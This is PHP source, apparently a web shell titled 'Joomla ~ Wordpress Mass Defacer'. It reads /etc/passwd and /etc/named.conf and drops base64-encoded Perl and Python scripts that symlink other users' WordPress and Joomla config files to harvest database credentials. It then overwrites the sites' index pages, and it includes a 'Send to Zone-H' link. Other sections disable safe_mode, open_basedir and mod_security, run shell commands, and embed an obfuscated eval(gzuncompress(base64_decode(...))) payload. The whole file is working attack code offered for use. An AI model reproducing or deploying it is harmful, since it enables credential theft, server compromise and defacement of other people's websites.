- $def = urlencode($def);
- $output = fopen('defaced.html', 'a+');
- $defaced = '';
- $count1 = 0;
- $count2 = 0;
- echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
- $j = 1;
- $map = array();
- foreach($out as $d) {
- $info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
- $map[$info['name']] = $d;
- }
- $dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
- NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
- h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
- G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
- YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
- kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
- B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
- mkdir('plsym',0777);
- file_put_contents('plsym/plsym.cc', base64_decode($dt));
- chmod('plsym/plsym.cc', 0755);
- $wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
- $fp = @fopen ('plsym/.htaccess','w');
- fwrite($fp, $wr);
- fclose($fp);
- $res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');
- $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
- unlink('plsym/plsym.cc');
- $data = file_get_contents($url);
- preg_match_all('/<a href="(.+)">/', $data, $match);
- unset($match[1][0]);
- $i = 1;
- foreach($match[1] as $m)
- {
- $mz = explode('##',urldecode($m));
- $config01 = '';
- $config02 = '';
- if($mz[1] == 'joomla.txt') {
- $config01 = file_get_contents($url.$m);
- }
- if($mz[1] == 'wordpress.txt') {
- $config02 = file_get_contents($url.$m);
- }
- $domain = $map[$mz[0]];
- $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
- if($config01 && preg_match('/dbprefix/i',$config01)){
- echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
- echo '<td align="center"><font color="pink">JOOMLA</font></td>';
- $res = index_changer_joomla($config01, $def, $domain);
- echo '<td>'.$res['output'].'</td>';
- if($res['cond']) {
- echo '<td align="center"><span class="green">DEFACED</span></td>';
- fwrite($output, 'http://'.$domain."<br>");
- $count1++;
- } else {
- echo '<td align="center"><span class="red">FAILED</span></td>';
- }
- echo '</tr>';
- }
- if($config02 && preg_match('/DB_NAME/i',$config02)){
- echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
- echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
- $res = index_changer_wp($config02, $def);
- echo '<td>'.$res['output'].'</td>';
- if($res['cond']) {
- echo '<td align="center"><span class="green">DEFACED</span></td>';
- fwrite($output, 'http://'.$domain."<br>");
- $count2++;
- } else {
- echo '<td align="center"><span class="red">FAILED</span></td>';
- }
- echo '</tr>';
- }
- }
- echo '</table>';
- echo '<hr/>';
- echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
- echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
- if($count1+$count2 > 0){
- echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
- }
- }
- function exec_mode_3($def_url) {
- $domains = @file_get_contents("/etc/named.conf");
- @preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
- $out = array_unique($out[1]);
- $num = count($out);
- print("Total domains: $num<br><br />");
- $def = file_get_contents($def_url);
- $def = urlencode($def);
- $output = fopen('defaced.html', 'a+');
- $defaced = '';
- $count1 = 0;
- $count2 = 0;
- echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
- $j = 1;
- $map = array();
- foreach($out as $d) {
- $info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
- $map[$info['name']] = $d;
- }
- $dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
- kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
- VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
- 3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
- cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
- MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
- R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
- mkdir('plsym',0777);
- file_put_contents('plsym/data.txt', $_POST['man_data']);
- file_put_contents('plsym/plsym.cc', base64_decode($dt));
- chmod('plsym/plsym.cc', 0755);
- $wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
- $fp = @fopen ('plsym/.htaccess','w');
- fwrite($fp, $wr);
- fclose($fp);
- $res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');
- $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
- unlink('plsym/plsym.cc');
- $data = file_get_contents($url);
- preg_match_all('/<a href="(.+)">/', $data, $match);
- unset($match[1][0]);
- $i=1;
- foreach($match[1] as $m)
- {
- $mz = explode('##',urldecode($m));
- $config01 = '';
- $config02 = '';
- if($mz[1] == 'joomla.txt') {
- $config01 = file_get_contents($url.$m);
- }
- if($mz[1] == 'wordpress.txt') {
- $config02 = file_get_contents($url.$m);
- }
- $domain = $map[$mz[0]];
- $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
- if($config01 && preg_match('/dbprefix/i',$config01)){
- echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
- echo '<td align="center"><font color="pink">JOOMLA</font></td>';
- $res = index_changer_joomla($config01, $def, $domain);
- echo '<td>'.$res['output'].'</td>';
- if($res['cond']) {
- echo '<td align="center"><span class="green">DEFACED</span></td>';
- fwrite($output, 'http://'.$domain."<br>");
- $count1++;
- } else {
- echo '<td align="center"><span class="red">FAILED</span></td>';
- }
- echo '</tr>';
- }
- if($config02 && preg_match('/DB_NAME/i',$config02)){
- echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
- echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
- $res = index_changer_wp($config02, $def);
- echo '<td>'.$res['output'].'</td>';
- if($res['cond']) {
- echo '<td align="center"><span class="green">DEFACED</span></td>';
- fwrite($output, 'http://'.$domain."<br>");
- $count2++;
- } else {
- echo '<td align="center"><span class="red">FAILED</span></td>';
- }
- echo '</tr>';
- }
- }
- echo '</table>';
- echo '<hr/>';
- echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
- echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
- if($count1+$count2 > 0){
- echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
- }
- }
- echo '<!DOCTYPE html>
- <html>
- <head>
- <title>Joomla ~ Wordpress Mass Defacer</title>
- <link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css">
- <style type="text/css">
- table,body {
- background:
- url("http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG") repeat ,
- url("http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG") no-repeat center top,top left,top right,
- url("https://d33ds.co/img/bg2.png") repeat top left;
- background-color: #ffffff;
- color:white;
- font-family: "Trebuchet MS",Arial;background-attachment:fixed;margin:0;padding:0;}
- .header {position:fixed;width:100%;top:0;background:#000;}
- .footer {position:fixed;width:100%;bottom:0;background:#000;}
- input[type="submit"]{background-color:rgba(25,25,25,0.6);border:1; padding:2px; border-bottom:2px solid white; font-size:25px;font-family:orbitron; color:red;border:2px solid white;margin:4px 4px 8px 0;}
- input[type="submit"]:hover{color:SeaShell;}
- input[type="text"]:hover{color:SeaShell;}
- input[type="radio"]{margin-top: 0;}
- .td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}
- input[type="text"] {background:#111111; border:1; padding:2px; border-bottom:2px solid #393939;font-family:orbitron; font-size:25px; color:#ffffff;border:2px solid #4C83AF;margin:4px 4px 8px 0;}
- .even {background-color: rgba(25, 25, 25, 0.6);}
- .odd {background-color: rgba(102, 102, 102, 0.6);}
- a {color:#fff;} a:hover {color:#00BFFF;}
- fieldset{border: 1px solid grey; background: rgba(0,0,0,0.7); width: 600px; margin: 0 auto;min-height:240px;}
- textarea{background: rgba(0,0,0,0.6); color: white;}
- .green {color:#00FF00;font-weight:bold;}
- .red {color:#FF0000;font-weight:bold;}
- .killme {position: fixed; top: 20px; right: 20px; border: 2px solid yellow; padding: 10px; font-size: 20px; color: red; font-weight: bold;}
- </style>
- <script type="text/javascript">
- function change() {
- if(document.getElementById(\'rcd\').checked == true) {
- document.getElementById(\'tra\').style.display = \'\';
- } else {
- document.getElementById(\'tra\').style.display = \'none\';
- }
- }
- function hide() {
- document.getElementById(\'tra\').style.display = \'none\';
- }
- </script>
- </head>
- <body>
- <h2 style="color:#00ff00;text-align: center;font-family:orbitron;text-shadow: 6px 6px 6px black;">Wordpress and Joomla Mass Defacer</h2>';
- if(!isset($_POST['form_action']) && !isset($_GET['zh']) && !isset($_GET['mode']) && !isset($_GET['kill'])){
- echo '<div align="center">
- <form action="" method="post">
- <table>
- <tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>using /etc/named.conf ('.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
- <tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>using /etc/passwd ('.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
- <tr><td><input type="radio" value="2" name="mode" id="rcd" onclick="change();"></td><td>manual copy of /etc/passwd</td></tr>
- <tr id="tra" style="display: none;"><td></td><td><textarea cols="40" rows="5" name="man_data"></textarea></td></tr>
- </table>
- <br />
- <input type="hidden" name="form_action" value="1">
- <table>
- <tr><td><b>index url: </b><input size="35" type="text" name="defpage" value="http://wget.yu.tl/files/lol.css"></tr></td>
- </table>
- <input class=submit type="submit" value="Attack !" name="Submit">
- </form>';
- }
- $milaf_el_index = $_POST['defpage'];
- if($_POST['form_action'] == 1) {
- if($_POST['mode']==1) { exec_mode_1($milaf_el_index, $hacker); }
- if($_POST['mode']==2) { exec_mode_2($milaf_el_index); }
- if($_POST['mode']==3) { exec_mode_3($milaf_el_index); }
- }
- if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }
- echo '</body>
- </html>'; }
- if($_POST['azzatssins2']){
- //$us = file_get_contents("/etc/passwd");
- $usa = fopen('/etc/passwd','r');
- $dir = mkdir('jmp', 0777);
- $rrrr = "Options all \n DirectoryIndex jump \n Require None \n Satisfy Any";
- $frr = fopen('jmp/.htaccess', 'w');
- fwrite($frr, $rrrr);
- while($us = fgets($usa)){
- if($us==""){
- echo "<font color=red>can't read /etc/passwd</font>";
- }
- else{
- preg_match_all('/(.*?):x:/', $us, $user_byk);
- foreach($user_byk[1] as $user){
- $dir1 = "/home/$user/public_html/";
- if(is_readable($dir1)){
- echo "<font color=lime>[+]</font> <font color=green><b><i><font color='lime'>$dir1</i></b></font><br>"; }
- else{
- }
- }
- }
- }}
- if($_POST['azzatssins3']){
- $py =base64_decode('Iy8qUHl0aG9uDQoNCmltcG9ydCB0aW1lDQppbXBvcnQgb3MNCmltcG9ydCBzeXMNCmltcG9ydCByZQ0KDQpvcy5zeXN0ZW0oImNvbG9yIEMiKQ0KDQpodGEgPSAiXG5GaWxlIDogLmh0YWNjZXNzIC8vIENyZWF0ZWQgU3VjY2Vzc2Z1bGx5IVxuIg0KZiA9ICJBbGwgUHJvY2Vzc2VzIERvbmUhXG5TeW1saW5rIEJ5cGFzc2VkIFN1Y2Nlc3NmdWxseSFcbiINCg0Kb3MubWFrZWRpcnMoJ3NsJykNCm9zLmNoZGlyKCdzbCcpDQoNCnN1c3I9W10NCnNpdGV4PVtdDQpvcy5zeXN0ZW0oImxuIC1zIC8gQVpaQVRTU0lOUyIpDQoNCmggPSAiT3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzXG5EaXJlY3RvcnlJbmRleCBzbFxuQWRkVHlwZSB0ZXh0L3BsYWluIC5waHBcbkFkZFR5cGUgdHh0IC5waHBcbkFkZEhhbmRsZXIgdHh0IC5waHAiDQptID0gb3BlbigiLmh0YWNjZXNzIiwidysiKQ0KbS53cml0ZShoKQ0KbS5jbG9zZSgpDQpwcmludCBodGENCg0Kc2YgPSAiPHRpdGxlPlN5bWJvbGljIExpbmtzPC90aXRsZT48Ym9keSBiZ2NvbG9yPWJsYWNrPjxjZW50ZXI+PGJyPjxkaXYgc3R5bGU9YmFja2dyb3VuZDptYXJvb247bWFyZ2luOjBweDtwYWRkaW5nOjRweDt0ZXh0LWFsaWduOmNlbnRlcjtjb2xvcjpzaWx2ZXI7PjxpPjxmb250IGNvbG9yPWxpbWU+JmNvcHk7IDwvZm9udD48YSBocmVmPW1haWx0bzpjeWJlcnNlcmtlcnNAZ21haWwuY29tPkFaWkFUU1NJTlMgQ1lCRVJTRVJLRVJTPC9hPjwvaT48YnI+PGJyPjxicj48L2NlbnRlcj4iDQoNCm8gPSBvcGVuKCcvZXRjL3Bhc3N3ZCcsJ3InKQ0Kbz1vLnJlYWQoKQ0KbyA9IHJlLmZpbmRhbGwoJy9ob21lL1x3KycsbykNCg0KZm9yIHh1c3IgaW4gbzoNCgl4dXNyPXh1c3IucmVwbGFjZSgnL2hvbWUvJywnJykNCglzdXNyLmFwcGVuZCh4dXNyKQ0KcHJpbnQgIi0iKjMwDQp4c2l0ZSA9IG9zLmxpc3RkaXIoIi92YXIvbmFtZWQiKQ0KDQpmb3IgeHhzaXRlIGluIHhzaXRlOg0KCXh4c2l0ZT14eHNpdGUucmVwbGFjZSgiLmRiIiwiIikNCglzaXRleC5hcHBlbmQoeHhzaXRlKQ0KcHJpbnQgZg0KcGF0aD1vcy5nZXRjd2QoKQ0KaWYgIi9wdWJsaWNfaHRtbC8iIGluIHBhdGg6DQoJcGF0aD0iL3B1YmxpY19odG1sLyINCmVsc2U6DQoJcGF0aCA9ICIvaHRtbC8iDQpjb3VudGVyPTENCmlwcz1vcGVuKCJzeW1saW5rLmh0bSIsInciKQ0KaXBzLndyaXRlKHNmKQ0KDQpmb3IgZnVzciBpbiBzdXNyOg0KCWZvciBmc2l0ZSBpbiBzaXRleDoNCgkJZnU9ZnVzclswOjVdDQoJCXM9ZnNpdGVbMDo1XQ0KCQlpZiBmdT09czoNCgkJCWlwcy53cml0ZSgiPGJyPjxicj48Y2VudGVyPjxicj48ZGl2IHN0eWxlPWJhY2tncm91bmQ6dmlvbGV0O21hcmdpbjowcHg7cGFkZGluZzo1cHg7dGV4dC1hbGlnbjpjZW50ZXI7Y29sb3I6d2hpdGU7PjxiPjxpPjxmb250IGNvbG9yPXNpbHZlcj48Zm9udCBjb2xvcj1saW1lPiVzPC9mb250PiB8IDxmb250IGNvbG9yPW9yYW5nZT4lczwvZm9udD4gfCA8YSBocmVmPUFaWkFUU1NJTlMvaG9tZS8lcyVzIHRhcmdldD1fYmxhbmsgPiVzPC9hPjwvZm9udD48L2k+PC9iPjwvZGl2PjwvY2VudGVyPiIlKGNvdW50ZXIsZnVzcixmdXNyLHBhdGgsZnNpdGUpKQ0KCQkJY291bnRlcj1jb3VudGVyKzE=');
- $pys = fopen("symlink.py","w+");
- fwrite($pys,$py);
- system('python symlink.py');
- system('rm symlink.py');
- echo'<meta http-equiv="Refresh" content= "0; url=sl/symlink.htm">';
- }
- if($_POST['azzatssins4']){
- @session_start();
- @set_time_limit(0);
- @ini_set('max_execution_time',0);
- @mkdir('xazs',0777);
- $sempak = "Options all <br>
- DirectoryIndex azzatssins.html <br>
- AddType text/plain .php <br>
- AddHandler server-parsed .php <br>
- AddType text/plain .html <br>
- AddHandler txt .html <br>
- Require None <br>
- Satisfy Any";
- $masuk =@fopen ('xazs/.htaccess','w');
- fwrite($masuk ,$sempak);
- @symlink('/','xazs/azzatssins.txt');
- $pg = basename(__FILE__);
- if(is_readable("/var/named")){
- echo"<title>Symlink</title><body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>";
- echo '<table align="center" border="3" width="400" cellspacing="0" cellpadding="0">
- <td align="center"> <font color="white"> <b>_DOMAINS_</b></td>
- <td align="center"> <font color="white"> <b>_USERS_</b></td>
- <td align="center"> <font color="white"> <b>_SYMLINK_</b></center></td>';
- $list = scandir("/var/named");
- foreach($list as $domain){
- if(strpos($domain,".db")){
- @error_reporting(0);
- @ini_set('log_errors',0);
- @ini_set('error_log',NULL);
- $i += 1;
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
- echo "<tr>
- <td><a class='azzatssins' href='http://".$domain." '>".$domain."</a></td>
- <td align='center'><font color='white'>".$owner['name']."</td>
- <td align='center'><a href='xazs/azzatssins.txt".$owner['dir']."/public_html/' target='_blank'>Symlink</a></td>";
- }
- }
- flush();
- flush();
- }
- echo "</tr></table></div></html>";
- }
- if($_POST['azzatssins5']){
- echo ini_get("safe_mode");
- echo ini_get("open_basedir");
- ini_restore("safe_mode");
- ini_restore("open_basedir"); $phi = fopen("php.ini","w+");
- fwrite($phi,"safe_mode = Off
- disable_functions = NONE
- safe_mode_gid = OFF
- open_basedir = OFF ");$phii = fopen(".htaccess","w+");
- fwrite($phii,"<IfModule mod_security.c>
- KillFilterEngine Off
- KillFilterScanPOST Off
- KillFilterCheckURLEncoding Off
- KillFilterCheckUnicodeEncoding Off
- </IfModule>
- "); }
- if($_POST['azzatssins6']){
- $mys =base64_decode('PD9waHAgZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZU5yTlBXdFhHN21TbjJmT21mK2c5UGltN2NFWW16eXZqWjJRUUdZNFE0QUw1TjZkeFY1djIyNURMM2EzMDkwT01CbisrOVpEcjM2WVFKTGRjK2NCTGFsVUpaV2tVbFdwSkg3NjBZL2pLQjdHL2lLSzB5QThyNzZvZFg3NjhYWGlwOE81ZHg2TWh4K1hVZW9udzNnWnBzSGNyemF4T0JvTms5U0wweW9tS25Nc0VGM2hYeTltMGNTdnVzS3RpM2t3amlPcVVTTWdncGVBWE9Pc05SQnI2cnM1QUtDSlB3MUNxSCt5UFR3K1BEd0ZMRWxLVFp0NVk4anU5eUhIM1lBZmt5QU9QVUE5SEw3YjI5OGREbXUxQnVRam5ZME5oV1R2WlBpdnZRUEdBZjlWajM0N0doNmVBQUxNcllsWG9pWGFvaWxxRmwxZFpXZnZlUGZ0NmVIeEg4T1QzYVB0NDIzNEZOMnV3QmJrNE44ZXZnZjQ4Y3hMa3FGL0hTUnBVblV4YnlXQlg0L2VRb1h6UEh2UEYyUEpxRW1RREtmTGNBeDhRcWp4OUh6NHlZdXJMdVI3bzVsUFpXa1FoVW0rS2REQnZZTjNoNEM5K3NpUC9mT2c2aXd1RmtFNGpaeTZ4bHJMTm96R0dRZGdPQXZtUWNxais5T1AweWoydmZGRjFZdGo3NmJxRG4vZGhjRndoMGVISjZmUU15OFJGUmlWajBzL1NXdmlzd0d2Nkd5R3VmUnZSTGNISDUrODJkSW4wR0FxcWxUd3VYa3JIZ0ZMaDY3T1orNVFVbFlCSGlSRGJvUkNBdTI3aFhLSlhPSG1YUDVQRWhsZmVESDBqc1p0bVU1Zk1wMEwzNXY0Y2RVWlIySHFoK242NmMzQ2I0dlV2MDQzTHRMNXJDTmt0UzVVV1gvcEVEbmh6eEsvZ0hNVW5EOTdJRTZzY2hmSzg5SGxBekZDamJzUXpqeFkwcTBINGd5U2FQM2x5MmQvWDk5MEpMZHgrZnF6S2JIN1pQZjRuN3ZIWnk0dXA1UGQvWGZ1QUNaVWFYYmJ5ajU1ZTd4M2REbzgySDYvNitKS3IrQ2NBNUV3WHdCU2xoSTA4ZVRZVFNLUVJNeGxiM3k1WE14dmtvOHpWengrTEI1VkV1K1Q3eVhUWU1ZVGFqS0NEb1ZRWlhRUkpXbGR3TWN5OFdQNldNQ3FwQThVRnZBaGU4aGxJTzVvdmFXNHFxQVZOTTJHMDFtd3FISWVsY1orc3B3Qk04WEhxblB5MitHL0JCVWx4QmxzNmlNSlVST0xxcnQxc2Rsekc5VFlJWW5WS3NpbHJRM01KV1RZYUd3S29CdDVDWDFXRFk5K096MDlHdjZHUzJ6UWNJZnZiMDcrc2QvQWJtTlZPWGp1V3psNEtRMmV0MWpNZ3JHSDBtQmpHVjZHMFZWWUNyMFRKSXNvQ1JBT0txVXByTlU1NUhlRWFsRFhiZWpHc1VqSFBreTgxSU9tdWk3a1hGMUFNYzZ1SmZUckNuSzVsMU0vSFYrb0ZTbzVvZGR6a0FDekpUUFBaRTBROUFPR3NHZzBZSm5ENTNLK0lOaXFnYTNwaGMzMHhyTW80YmtDd2paVnN4UEp5VW5UN2JxTWwzanhXUTBTVHdHbUN5TXpUODZ4WTBjem1FbStDTUxGTWhVTTR1ckY5RDBtRnhGSHhxcTlRWFo2UnRNMzM1elRDNTlHUk54RVMzSGxoYW5ZZ1Y3TUltOUNVL1FLWkdvWWhZUUpSaS9iMHN4RWhjWHFqMU9CTlllSXNPcmFkR0dLeU9sclppOWdnSG83eDRkSDRuVDd6ZjZ1MkhzbmR2OWo3K1QwUktUenhkQUx6LzBaMXdLd3Q4ZTcyNmU3RWxBWGk2cVVMR0wvOE9EWE4vdUhiOFRCNGFrNCtMQy9YOU5WOXcrM2Q4VE85dWsyQUwzZDNoZXdZY0VHTGx5bjRVMG1DZXlpRjM2T1NRM0hCYWpUd3dLNWQzdTcrenNuNG5UMytQM2VBYlJuUjd6NUE3WVRMaDErTmhMbWR1aEgwK0hRRmJzbmI3ZVBKSndyOXZjT2RoOVNuZnRReG1mVjcya2N6VTBEVlpjdHBtYkxjQnZqdGZSNjlXSXlZaWE2eXMrWGZSaGZuakJURDM1T1JFNzJaQ2NJQXFJeUFEVVhYbnFCbjFsTzMwdk1YSzlMVVlIMXoxellQZnd3Z1FKMzhFMkNoN0Vwb1poQjVteVB4LzRpWGQvM3cvUDBvaTJjQm1oelVMdGFrU0tDcE1INEloSXl3eElPZ3Y3OTZjZFhQUlFTVzdqUDlmQTNZTWJmY3grRXowV2FMdFpCYXdrK2RaMjMxdDdvcUhIdE9pczJYa1NSQnVuTTc3My9BNFQxMWdZbklEZEpiMkJVa0h1eThqaEpFSHdVVFc3cTZlVHpGREMzUld0emNTMjI0OENiMVUrOWkyanVkV2FneTYxZitNSDVCUlkvWDF4M29QRU5razljcDFnRk44anpPRnFHay9iUDArbTBNNHBpNEJyVUJzQWttZ1VUOGZQejU4ODdDMWhmSUI3YlVMOGpDV3h1U3Z3ZWFHOFdlaGk5WlJ6NHNUandyMENaZkIrRlViSUFCZnhyU0NINlVTbytNK2o2T0pwRmNmdm5VUlAvemVCN01zRi9PeEpnU3Y5MFZuUTUxMzVQZk9acTR1ZG1jOXBCZnE5UC9IRVUwNHh0QTNvL1JzWVNiUHNpK3VUSHVzSzAyU3hVUUJuTGZKbWxMUUdqSlJ1ZlJvdTIxVlhEZ2ZWUmxLYlIzQzZjVENaWmRyWHdYODJhWndEWmFzS1BaL3kvSXJmNXZjajlIZis5bTl3MEdpK1Q3MFVQL3ZHOHUrbmhvdnRPNVB5LzQ3K3J5ZUc4V2IvaVdUS0taaE9idm9DNUhINjJJY0lvbm5zemhBRTdadjU1N3NYblFkaHVhdlJOTExyWUxDdFFNL0VwRUxYWExtVVFqU1Q0MDIrM01DbW45ck0zejE4K2Y0Y29sN01HeWVOWllGQkxvS2RQbnhieDJkOVkvWE4rNHBKMm9GQzhlUEdpTXdVTklHM1AvR25hQWZzUHJPaWI5bWdXalM4N1Y4RUVSR25yR1RDdHc3VFhZMEtPYkVUa1d4c2t3a2lXamVOZ2tkckM3SCs4VHg3bm9reFQ5cWg0ZStHUEw3ZG5zeXF5VWRtRlZiQmRSZEJ0ZG9JdHpHN0Fqb2s3UU5LWWtUanZCR3RyQklwZ3FCZG5nTTZDZ2R6Ly9BYnB6V2d3amk4dXZSbG94U0RsRzJNa0NSdWZyTWRGS3BjM0FLdUJsV293SVdLeG55N2pVRXhnQlNDZEJ0alp1MHp5emMzZUJLRjRlOVkxenlPUFBxcndDM1dsU3RWVldXNnR3UjhOTWtTN2tPamtBWkxsQ0kxcmlSVjRTOHhENW02b3JRaDNCa0U4N3pwNk5wQTJ2QTdERmkzVDlqUzRoajZKSzFnazZ5T1EySmR0K3JrT1BlYWRpSlZFSE5tdTAybzIvK1lJWGxCZHB3bDdtVCtieVhtcjB5alZaWm9ReE96SDZEb28rRGhyMHR2QzlhSmF4aE9LcGtySDZaMTRVeCsyaDRuZjNucTF1RmdJMm9TQmwrUHBlZFZOb0hBNGgwSlFOMS8xb00rQUJsSENoaHY3MDY1akpsRmJjOWVkUmVmUVZWUlFlL3YwdWJYaDljU1hhb0VLNDAzbVFVajFWSTBOYlB0R0d1TVA1QXhyQUE5Z1V1dFprVXRiaUMrbEFjTWVTMWZKSEFkUitVcElmK24yck9ISFlaOTdsLzVGZ0w0eGxkdmhxdE1vU3FYdHkzb2VsNHUvL2hMcUU4MWcwMFdjdjQra1FZSUdzZnBFYXo4YWV6Tk1vR253U05vcUVvWStwUzMzU0Zvb3NvZytvZWpKaytaemx6eFFJMndaWm0yeGFjUnJIOW8vOFVOSEJKTXVPaEZDVUgwZFFVcWNTZklhY0ZxTzJPaTVzbGZLRHVTRzFtajlTQkpnK0RrMmpiNGswaWNxZlllcjlDVVpLODEwK2s1RjUyejArcUZEUzk2bWlOMldkdGE5U1dJZG02Uk1XeVJsVGpsSnRBc2ZTaExyMkNSbDJpSXBjMWFRUkhQem9TU2hUb1lrcDIyU25GTk9rc3pwQjVMRU9qWkptYlpJeXB3eWtsTHhmaGhOV2NrUU5SbWFxc25TWkhIZS92QkZWMVRlRThYcmwxMUhtSjVYbFlNQjVHSUV2MUt3NzZuWXJkM2xaVkJPQnVWalVDNEc3V0c0di9kcWl1NjExOU5vZ2VZU1duMTE5OHBWTmlXVTF2S3VBOWZ5Y2JsZjVlUDZmL0FjcmZBVjFRWDJTRHVNcHV3cmtubGtaUzdqR1hxVXJUTUZlZEpRZDkwNjhZZGtkZFhkZ2Zhak1Tb3V2RVFrU3pCQWswVHcrSXMwRW5vN2t0WXI0RzI0RHJBdGh0MnY2d3hITXk4RTh4QktFU2V5eDJQdTVKMVlaZzRBMFRlTW4yMTV0MmE3dEdtNGdoQm1CUXR0L2dSY1BJQ1gvZzEwQ3Qyek1LdmxWMHF1VlJvQjdaN1gxY2c5cjd6elVNZTQ1bFZDNFd3d3FnYW1rWTJTZ01wMmNwNG